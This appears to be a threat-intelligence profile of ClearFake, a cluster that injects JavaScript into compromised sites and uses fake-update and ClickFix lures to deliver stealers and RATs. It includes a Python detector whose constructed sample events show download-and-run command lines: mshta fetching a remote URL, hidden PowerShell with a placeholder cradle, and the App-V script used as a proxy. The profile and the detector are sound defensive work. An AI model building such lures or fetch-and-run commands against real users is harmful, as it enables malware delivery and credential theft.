ClearFake
ClearFake is a threat activity cluster, first identified in 2023, associated with compromised websites into which malicious JavaScript has been injected to deliver malware via drive-by download techniques. It is widely described as a Fake Update actor and as a malicious JavaScript framework deployed on compromised sites. Reporting also states that Google tracks the original group behind EtherHiding as UNC5142.

ClearFake is known for social-engineering users into executing malware themselves, especially through fake CAPTCHA lures and malicious copy-and-paste workflows described as paste-and-run, ClickFix, and fakeCAPTCHA. It has also used fake browser update decoys on compromised WordPress sites. Multiple reports describe ClearFake as an early adopter of paste-and-run as an initial execution technique, and later reporting states that it adopted ClickFix in May 2024.

Observed ClearFake delivery chains include luring victims into running PowerShell or MSHTA commands, including abuse of the signed Microsoft App-V script SyncAppvPublishingServer.vbs as a living-off-the-land proxy to fetch payloads. Infrastructure and tradecraft have been linked to redirects from compromised sites to fake verification pages and to the use of trusted or legitimate services and CDNs, including jsDelivr; separate reporting attributes EtherHiding development and deployment to ClearFake.

Payloads attributed to ClearFake in the cited reporting include Emmenhtal Loader, NetSupport RAT, Lumma Stealer/LummaC2, ArechClient2, and ACR Stealer. One report specifically describes an ongoing CLEARFAKE campaign using ClickFix to lure victims into running MSHTA commands that ultimately deploy Lumma Stealer. Another report says researchers suspected a ClickFix campaign distributing NetSupport RAT over ClearFake infrastructure. Victimology in the cited reporting is broad and opportunistic through compromised websites, though one report notes that App-V-dependent ClickFix chains likely skew toward enterprise-managed Windows environments.

Reporting cited here says ClearFake remained highly prevalent in 2026 threat telemetry, ranking in Red Canary's top-threat reporting and being described as one of many notoriously known Fake Update actors.
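As an added illustration, not code from the cited reporting or from any vendor's rule set: a small Python detector that flags process-creation events consistent with the paste-and-run/ClickFix chains described above, namely an interpreter such as mshta.exe, powershell.exe or wscript.exe spawned by explorer.exe with a URL in its arguments, mshta.exe fetching remote content, and SyncAppvPublishingServer.vbs invoked with a URL. The event format and all sample events are constructed, with placeholder tokens standing in for real command content.

```python
import re

# Constructed sample process-creation events, NOT real telemetry.
# Field layout: parent_image|image|command_line
SAMPLE_EVENTS = [
    "explorer.exe|mshta.exe|mshta.exe https://example.invalid/verify",
    "explorer.exe|powershell.exe|powershell.exe -w hidden -c \"<cradle> https://example.invalid/c\"",
    "explorer.exe|wscript.exe|wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n;<cradle> https://example.invalid/s\"",
    "svchost.exe|mshta.exe|mshta.exe C:\\Program Files\\Vendor\\setup.hta",
    "cmd.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "explorer.exe|notepad.exe|notepad.exe notes.txt",
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Interpreters a ClickFix lure typically asks the victim to paste into Win+R or a terminal.
LOLBIN_IMAGES = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def parse_event(line):
    """Split one constructed event line into (parent, image, command_line)."""
    parent, image, cmdline = line.split("|", 2)
    return parent.lower(), image.lower(), cmdline


def classify(line):
    """Return the names of the ClickFix-style rules this event matches (possibly none)."""
    parent, image, cmdline = parse_event(line)
    hits = []
    # Paste-and-run: the victim pastes into the Run dialog, so the desktop shell
    # (explorer.exe) is the parent of an interpreter that carries a remote URL.
    if parent == "explorer.exe" and image in LOLBIN_IMAGES and URL_RE.search(cmdline):
        hits.append("paste_and_run_from_explorer")
    # mshta pulling remote content is anomalous in most fleets whatever the parent.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_url")
    # Signed App-V script used as a proxy to run attacker-supplied arguments.
    if "syncappvpublishingserver.vbs" in cmdline.lower() and URL_RE.search(cmdline):
        hits.append("appv_script_proxy")
    return hits


def detect(lines):
    """Run every rule over a batch of events; returns (rule_name, event) pairs."""
    return [(rule, line) for line in lines for rule in classify(line)]


if __name__ == "__main__":
    for rule, line in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {line}")
```

Local .hta launches and scripted PowerShell from cmd.exe produce no hits, so the rules stay quiet on the benign samples while catching all three lure-driven chains.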
Tradecraft
42 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
5 malware families attributed to this actor across reporting.
Observables
19 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
9 sources tracked across advisories, community write-ups, and news.
Activity cluster delivering malware through compromised websites using injected JavaScript, drive-by downloads, and fake CAPTCHA/copy-paste lures.
Activity cluster that injects JavaScript into compromised websites to deliver malware, including via drive-by download techniques; also observed leveraging 'paste and run' as an initial execution technique.
Malvertising/malware distribution cluster using compromised sites and fake verification (reCAPTCHA/Turnstile) and fake browser update lures to deliver info-stealers.
A campaign that compromises WordPress sites and uses fake browser update decoys and ClickFix-style CAPTCHA lures to distribute malware, including multi-stage delivery chains using blockchain and CDN infrastructure.